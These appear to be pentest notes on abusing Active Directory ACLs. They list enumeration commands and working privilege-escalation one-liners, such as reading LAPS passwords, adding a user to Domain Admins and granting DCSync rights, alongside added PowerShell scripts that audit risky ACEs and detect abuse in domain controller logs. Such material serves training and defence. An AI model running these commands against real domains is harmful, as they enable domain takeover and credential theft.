ACL Abuse

Enumeration

ADModule:
# Import
Import-Module C:\ADModule\Microsoft.ActiveDirectory.Management.dll
Import-Module C:\ADModule\ActiveDirectory\ActiveDirectory.psd1
# Get DistinguishedName
Get-ADUser -Identity USER
# Find ACLs related to that user
(Get-Acl 'AD:\CN=USER,CN=Users,DC=it,DC=gcb,DC=local').Access

PowerView_Dev:
# Find ACEs granting modify rights to non-built-in principals, with rights GUIDs resolved to names
Find-InterestingDomainACL -ResolveGUIDs

PowerView:
# Older PowerView equivalent of the above
Invoke-ACLScanner -ResolveGUIDs
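The enumeration above is the same check a defender runs to find these rights before anyone else does. The script below is an added example and is not part of these notes or of PowerView/ADModule: it walks an OU or the whole domain with the Microsoft ActiveDirectory module and the AD: drive, and reports every Allow ACE that carries one of the rights discussed on this page (GenericAll, GenericWrite, WriteDacl, WriteOwner, WriteProperty, ExtendedRight, Self) to a principal that is not on an expected-holders list. The GUID-to-name table and the expected-principals list are assumptions for a generic lab domain and should be adjusted per environment.

```powershell
# Added example (not from the original notes): audit risky ACEs under a search base.
# Assumes the ActiveDirectory module is installed and the caller may read nTSecurityDescriptor.
Import-Module ActiveDirectory

# Well-known extended-right / attribute GUIDs that turn a generic ACE into a specific abuse path.
$KnownGuids = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes (DCSync)'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All (DCSync)'
    '00299570-246d-11d0-a768-00aa006e0529' = 'User-Force-Change-Password (reset without old password)'
    'bf9679c0-0de6-11d0-a285-00aa003049e2' = 'member attribute (Self-Membership / add members)'
    '00000000-0000-0000-0000-000000000000' = 'all properties / all extended rights'
}

# Rights that the notes above map to an abuse primitive.
$RiskyRights = 'GenericAll', 'GenericWrite', 'WriteDacl', 'WriteOwner', 'WriteProperty', 'ExtendedRight', 'Self'

# Principals expected to hold such rights (heuristic substring match; tune for your domain).
$ExpectedPrincipals = @(
    'NT AUTHORITY\SYSTEM', 'NT AUTHORITY\SELF', 'BUILTIN\Administrators',
    'Domain Admins', 'Enterprise Admins', 'Domain Controllers',
    'Enterprise Domain Controllers', 'Account Operators'
)

function Find-RiskyAce {
    param(
        # Domain head ('DC=techcorp,DC=local') or an OU distinguished name
        [Parameter(Mandatory)] [string] $SearchBase,
        [string[]] $ObjectClass = @('user', 'group', 'computer', 'organizationalUnit', 'domainDNS')
    )
    # Get-ADObject lists the objects; Get-Acl on the AD: drive reads each DACL.
    $objects = Get-ADObject -Filter * -SearchBase $SearchBase
    foreach ($obj in $objects) {
        if ($ObjectClass -notcontains $obj.ObjectClass) { continue }
        $acl = Get-Acl -Path ('AD:\' + $obj.DistinguishedName)
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            # ActiveDirectoryRights renders as "Self, WriteProperty, ExtendedRight, ..."
            $rights = $ace.ActiveDirectoryRights.ToString() -split ',\s*'
            $hit = $rights | Where-Object { $RiskyRights -contains $_ }
            if (-not $hit) { continue }
            $id = $ace.IdentityReference.Value
            if ($ExpectedPrincipals | Where-Object { $id -like "*$_*" }) { continue }
            $guid = $ace.ObjectType.ToString()
            [pscustomobject]@{
                Object      = $obj.DistinguishedName
                ObjectClass = $obj.ObjectClass
                Principal   = $id
                Rights      = ($hit -join ',')
                ObjectType  = if ($KnownGuids.ContainsKey($guid)) { $KnownGuids[$guid] } else { $guid }
                Inherited   = $ace.IsInherited
            }
        }
    }
}

# Usage: review the output per principal; inherited ACEs point at the OU/domain where they were set.
Find-RiskyAce -SearchBase 'DC=techcorp,DC=local' | Format-Table -AutoSize
```

Rows whose ObjectType resolves to the member attribute, the password-reset right or the replication rights correspond directly to the Group, User and DCSync sections of these notes; anything else with GenericAll/WriteDacl on a computer object is the RBCD and LAPS-read exposure.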

ReadProperty, ExtendedRight over OU / Computer Object

Most likely LAPS: the principal named in IdentityReferenceName can read the LAPS-managed local administrator password in cleartext for the computers in that OU.
LAPS Module:
# Import module
Import-Module C:\AD\Tools\AdmPwd.PS\AdmPwd.PS.psd1
# Find the principals that hold the extended right to read LAPS passwords for computers in the OU
Find-AdmPwdExtendedRights -Identity <OU>
# Once we have compromised a user that can read LAPS
Get-AdmPwdPassword -ComputerName <targetmachine>

WriteProperty | Self-Membership | GenericAll over Group

Can add members to the group.
ADModule:
# Add
Add-ADGroupMember -Identity "LocalAdmins" -Members USERS
# Check
Get-ADGroupMember -Identity "LocalAdmins"
PowerView_dev:
Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'

GenericWrite | GenericAll | WriteProperty over Computer Object

Can perform a Resource-Based Constrained Delegation (RBCD) attack, since these rights allow writing the computer object's delegation attribute.

GenericAll over User Object

Can reset the user's password without knowing the old one.

WriteDACL over DC

Can give a user DCSync privileges (replication rights on the domain object).
RACE:
Set-ADACL -SamAccountName USER -DistinguishedName 'DC=techcorp,DC=local' -GUIDRight DCSync -Server techcorp.local -Verbose
PowerView3:
Add-DomainObjectAcl -TargetIdentity 'DC=techcorp,DC=local' -PrincipalIdentity USER -Rights DCSync
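Each of the abuse paths on this page leaves a trace in a domain controller's Security log: a DACL rewrite shows up as event 5136 on the nTSecurityDescriptor attribute, a DCSync request as event 4662 carrying the replication GUIDs from a subject that is not a domain controller, and a group-membership add as 4728/4732/4756. The script below is an added detection example, not part of these notes or of RACE/PowerView; it assumes it runs on a DC where Directory Service Access, Directory Service Changes and Security Group Management auditing are enabled and a SACL on the domain object audits the replication rights.

```powershell
# Added example (not from the original notes): surface ACL-abuse side effects from the Security log.
# Assumes: run on a domain controller with the audit policies named in the lead-in enabled.
Import-Module ActiveDirectory

$ReplicationGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2',   # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2'    # DS-Replication-Get-Changes-All
)

# Turn an event's EventData block into a hashtable keyed by the Data Name attribute.
function ConvertTo-EventData {
    param([System.Diagnostics.Eventing.Reader.EventRecord] $Event)
    $xml = [xml] $Event.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    $data
}

function Get-AclAbuseIndicators {
    param([datetime] $Since = (Get-Date).AddDays(-1))
    # Replication by these computer accounts is normal; anything else is worth a look.
    $dcNames = (Get-ADDomainController -Filter *).Name

    # 1. Replication (DCSync-like) access by a principal that is not a domain controller.
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4662; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = ConvertTo-EventData $_
            $isReplication = $ReplicationGuids | Where-Object { $d.Properties -like "*$_*" }
            $subject = $d.SubjectUserName
            if ($isReplication -and ($dcNames -notcontains $subject.TrimEnd('$'))) {
                [pscustomobject]@{
                    Time      = $_.TimeCreated
                    Indicator = 'Replication right used by non-DC'
                    Subject   = "$($d.SubjectDomainName)\$subject"
                    Detail    = $d.ObjectName
                }
            }
        }

    # 2. A DACL rewritten on a directory object (how WriteDACL is cashed in, e.g. a DCSync grant).
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 5136; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = ConvertTo-EventData $_
            if ($d.AttributeLDAPDisplayName -eq 'nTSecurityDescriptor') {
                [pscustomobject]@{
                    Time      = $_.TimeCreated
                    Indicator = 'DACL modified'
                    Subject   = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
                    Detail    = $d.ObjectDN
                }
            }
        }

    # 3. Member added to a group (4728 global, 4732 domain-local, 4756 universal).
    Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4728, 4732, 4756; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            $d = ConvertTo-EventData $_
            [pscustomobject]@{
                Time      = $_.TimeCreated
                Indicator = 'Group member added'
                Subject   = "$($d.SubjectDomainName)\$($d.SubjectUserName)"
                Detail    = "$($d.MemberName) -> $($d.TargetUserName)"
            }
        }
}

# Usage: last six hours, oldest first.
Get-AclAbuseIndicators -Since (Get-Date).AddHours(-6) | Sort-Object Time | Format-Table -AutoSize
```

The 4662 check only fires if the domain object's SACL audits the two replication rights; without that SACL the event is never written, so verify the audit entry exists before relying on this detection.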

Resources